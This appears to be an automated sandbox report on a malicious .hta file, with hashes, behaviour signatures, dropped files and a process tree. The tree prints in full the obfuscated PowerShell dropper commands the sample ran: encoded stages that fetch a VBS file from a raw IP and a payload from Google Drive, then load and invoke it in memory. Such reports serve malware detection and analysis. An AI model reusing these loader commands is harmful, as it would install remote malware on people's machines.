Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29-10-2024 12:17

General

  • Target

    nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta

  • Size

    131KB

  • MD5

    07a93908c3113536577c9c5b734a0af0

  • SHA1

    794af14ec431e796ca6b61ed2094f623b86d77a9

  • SHA256

    809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202

  • SHA512

    34ef8170d518afbf42bc16a0759f3609153338e6e4bbc1ce05e94933e13ce4f6c1c8f5de7aedfe5f675311f593d5cbe377908815922d55a076eaa7c35493ba79

  • SSDEEP

    96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE
      "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1836
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2952
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp

    Filesize

    1KB

    MD5

    b0b72fcf0026cd6682e1e3563c62cebf

    SHA1

    90a198c0044bfbe28584c77a1268f05294d85527

    SHA256

    45dba0d7fa853be4c8a0eb1d061384bd0db0d9f57a81903a98cfd7dfface8c08

    SHA512

    6f7b62809d3443cdc47f4822146612db13637087befbaaa2342e1830fb1f2cef873153ac3bfbb5851de71c168eef7919885db93e4b138571830e9d10f0ee6b2a

  • C:\Users\Admin\AppData\Local\Temp\x42fpnjy.dll

    Filesize

    3KB

    MD5

    dd6e4513b2e133abb449997925cefbd2

    SHA1

    703be0b5ab1675eafe7920423527d93b85b84bff

    SHA256

    31a03dc9e321e20b8590a0a92940ddd04b6569aa3a742afb3c5e88b71f6acd21

    SHA512

    b8171dd059bcf00c8eb204f3c301f116903ce80293b863b462e15e08f6ac367b6948f11fb151881fd8002e69238377a631203db4be5986c9fa2963a43d5d0f46

  • C:\Users\Admin\AppData\Local\Temp\x42fpnjy.pdb

    Filesize

    7KB

    MD5

    dc648b72c594cb1a03995ab0d95c3748

    SHA1

    eda241790485f054cf85a6871e6d3f697534a266

    SHA256

    44135793881d359e7569f7b229892c463820d37932c233093a980400229eae00

    SHA512

    44437f7c84e644a0b83193b7c47f5c1f2efddf9df1e4ed25078c3bdc6c67a4f8e2b0bbc898ba5385cf986c74ad9f04922669542f2cda7f4c3f687cc03badf69b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c45d6dce016a4f81260de0ca4534940c

    SHA1

    1b7bee188328c32d8f3e33181a8f4f06dc66a000

    SHA256

    405badae793d0bd4fb1ca82d0a9baf36c9d5d44556b2d6008e49344494e51ae0

    SHA512

    53956b5a8cb9a2245a58f39b0d667cb554e8fcf218490110f41278dae829813a592a78d148803f4c1c7003fb83fef4ac79d69f2505a2e61e52dfe9ac6d6c1a40

  • C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS

    Filesize

    137KB

    MD5

    bf515f00df29b4be31ac6e43ab05cd88

    SHA1

    29073164d5fdfd336c332321ebd8c01920438a8b

    SHA256

    50b9f7f3880e858ac733e7a7fb6b679e699c8bc9553948d04b2c15194b7520dc

    SHA512

    6ebb327de4fd7dc7d348ec32c7d7cc9d79bd2753fae2e29f7910e27d52091c6765e6ec6c0e982156661e9b80fe223c831cc739956624ef66262adffa1174ada7

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp

    Filesize

    652B

    MD5

    7beb367a026c3ae036ca9c854a52938e

    SHA1

    44e5d47186b69bdf72f8ef392ffdc397a4438579

    SHA256

    0513e5f905d6c373aa983adc4bb0a6a165eb0f31d360789ad8a79b4aa2623676

    SHA512

    7d36e9ff5cd792f811e595fe33148ec501e44863b3aebd570691af2c669c51f8a98827294b676b88f428f93bb4b4cdcab036943512260e0eaae8f045d5abc74f

  • \??\c:\Users\Admin\AppData\Local\Temp\x42fpnjy.0.cs

    Filesize

    462B

    MD5

    bf57b8e732d7b6222960bf1d5dd5df18

    SHA1

    0cda321126a9876c2881199b2940c05492b0d94f

    SHA256

    f77463e3272af620bc1620c10233f07a3e1c43b77d053a3477a92579b912ccfc

    SHA512

    9ed1f51736815946772533e380020b0de4c449aaa72db6b2ce29d7eab458216dd8fa9b9333a07164c72290d758412dcbab51099da031ed465ee62f73a14cfabb

  • \??\c:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline

    Filesize

    309B

    MD5

    7e22b540e64920d5ac0458fe3f502bd5

    SHA1

    d48c6e50273b4ce0a4a9eee16b39a8c8cdd6d7a6

    SHA256

    ab041e688887801b573c580b110f8912c4c61fd5f5732404f85fbcd30fc08a79

    SHA512

    123b2d45bf9155804ba7bb169500bf318f0600e750ba8926fe5d6edcd694b92fb1f6ca94b9d09f78d4baf909925739403aed23e05e5057ba05d1f21422358c55